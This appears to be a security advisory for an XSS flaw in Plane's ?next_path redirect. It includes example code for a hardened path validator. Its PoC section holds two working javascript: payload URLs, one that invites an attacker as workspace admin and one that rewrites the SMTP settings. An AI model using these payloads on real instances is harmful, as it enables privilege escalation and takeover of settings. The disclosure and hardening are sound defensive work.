Summary
An open redirect vulnerability in the ?next_path query parameter allows attackers to supply arbitrary URL schemes (e.g., javascript:) that are passed directly to router.push. Because the router hands such a value to the browser as a navigation target, this becomes a cross-site scripting (XSS) vulnerability: attacker-supplied JavaScript runs in the victim's browser in the context of the application's origin. The attacker needs no account on the instance; the payload executes with the privileges of whoever opens the link, so the impact includes information disclosure, privilege escalation and modification of administrative settings.
Details
The application uses an authentication wrapper that accepts the query parameter ?next_path to determine where users should be redirected after completing certain operations (such as login).
Currently, the implementation does not properly validate the ?next_path parameter. This allows arbitrary schemes such as javascript: to be supplied, for example:
?next_path=javascript:alert(origin)
When processed, the application executes:
router.push("javascript:alert(origin)")
This results in attacker-controlled JavaScript being executed in the victim’s browser. An attacker can leverage this to coerce the victim into making authenticated HTTP requests on their behalf, thereby invoking Plane APIs under the victim’s privileges.
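To make the failure concrete, the following is an added example and not code from Plane: a stand-in router that records navigation targets, the unvalidated redirect the advisory describes, and a hardened resolver that accepts only an absolute same-origin path. The names makeRouter, redirectAfterLoginVulnerable, redirectAfterLoginHardened and safeNextPath, and the dummy origin app.invalid, are assumptions made for illustration.

```javascript
// Added example (not Plane's code): the unvalidated redirect the advisory
// describes, beside a hardened resolver that only allows in-app paths.
// All function names and the dummy origin below are hypothetical.

// Stand-in for a Next.js-style router that records what it was asked to
// navigate to. In a real browser, pushing "javascript:..." ends up as
// window.location.href = "javascript:..." and the payload executes.
function makeRouter() {
  const visited = [];
  return { push: (target) => visited.push(target), visited };
}

// Vulnerable: whatever ?next_path holds goes straight to the router.
function redirectAfterLoginVulnerable(router, search) {
  const next = new URLSearchParams(search).get("next_path") || "/";
  router.push(next);
}

// Hardened: accept only an absolute, same-origin path; anything else falls back.
function safeNextPath(raw, fallback = "/") {
  if (typeof raw !== "string" || raw === "") return fallback;
  // Must begin with exactly one "/": "//host" and "/\host" are scheme-relative
  // to browsers, and "javascript:" or "https:" values never get past this.
  if (!/^\/(?![\/\\])/.test(raw)) return fallback;
  // The URL parser strips tabs and newlines, which could hide a "//"; reject
  // control characters and spaces outright.
  if (/[\u0000-\u001F\u007F ]/.test(raw)) return fallback;
  // Resolve against a fixed dummy origin; if parsing moved us off it, reject.
  const base = "https://app.invalid";
  let url;
  try {
    url = new URL(raw, base);
  } catch {
    return fallback;
  }
  if (url.origin !== base) return fallback;
  // "/..//evil.example" normalises to the pathname "//evil.example", which a
  // router would treat as protocol-relative, so check the normalised path too.
  if (url.pathname.startsWith("//")) return fallback;
  return url.pathname + url.search + url.hash;
}

function redirectAfterLoginHardened(router, search) {
  router.push(safeNextPath(new URLSearchParams(search).get("next_path")));
}

// Constructed input: the advisory's payload, URL-encoded as a query string.
const payload = "?next_path=" + encodeURIComponent("javascript:alert(origin)");

// Stand-alone demonstration.
const vulnerable = makeRouter();
redirectAfterLoginVulnerable(vulnerable, payload);
const hardened = makeRouter();
redirectAfterLoginHardened(hardened, payload);
console.log("vulnerable router navigated to:", vulnerable.visited[0]);
console.log("hardened router navigated to:", hardened.visited[0]);
```

The hardened resolver deliberately rejects absolute URLs even when they point at the application's own origin, and it re-checks the pathname after normalisation because dot-segment collapsing can turn an apparently harmless path into a protocol-relative one. Allow-listing an in-app path is simpler to reason about than trying to enumerate dangerous schemes.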
PoC
Create Admin Account PoC
As an administrative user, visit the following link. This will trigger execution of attacker-supplied JavaScript, which in turn invites the attacker's email address into the workspace with role 20 (the admin role in the request body) and sends the invitation email to that address, giving the attacker an administrative account once accepted.
Replace <TARGET_PLANE_INSTANCE> with the target instance URL, <WORKSPACE> with the target workspace, and <ATTACKER_EMAIL> with the attacker’s email:
https://<TARGET_PLANE_INSTANCE>/?next_path=javascript:fetch(%22%2Fapi%2Fworkspaces%2F<WORKSPACE>%2Finvitations%2F%22%2C%20%7Bmethod%3A%22POST%22%2C%20headers%3A%7B%22Content-Type%22%3A%22application%2Fjson%22%7D%2C%20body%3AJSON.stringify(%7Bemails%3A%5B%7Bemail%3A%22<ATTACKER_EMAIL>%22%2Crole%3A20%7D%5D%7D)%7D)%3B
Change SMTP Server PoC
As an administrative user, visit the following link. This will execute attacker-supplied JavaScript to modify the SMTP configuration of the instance, giving the attacker control over outbound email delivery.
Replace placeholders <TARGET_PLANE_INSTANCE>, <SMTP_HOST>, <SMTP_PORT>, <EMAIL_USER>, <EMAIL_PASS>, and <SENDER>:
https://<TARGET_PLANE_INSTANCE>/?next_path=javascript:fetch(%27/api/instances/configurations/%27,+{method%3a%27PATCH%27,+headers%3a{%27Content-Type%27%3a%27application/json%27},+body%3a%27{%22EMAIL_HOST%22%3a%22<SMTP_HOST>%22,%22EMAIL_PORT%22%3a%22<SMTP_PORT>%22,%22EMAIL_HOST_USER%22%3a%22<EMAIL_USER>%22,%22EMAIL_HOST_PASSWORD%22%3a%22<EMAIL_PASS>%22,%22EMAIL_USE_TLS%22%3a%221%22,%22EMAIL_USE_SSL%22%3a%220%22,%22EMAIL_FROM%22%3a%22<SENDER>%22}%27})
Impact
An anonymous attacker could leverage this XSS vulnerability to steal sensitive data, escalate privileges by creating new admin accounts, or tamper with critical settings such as the SMTP server configuration.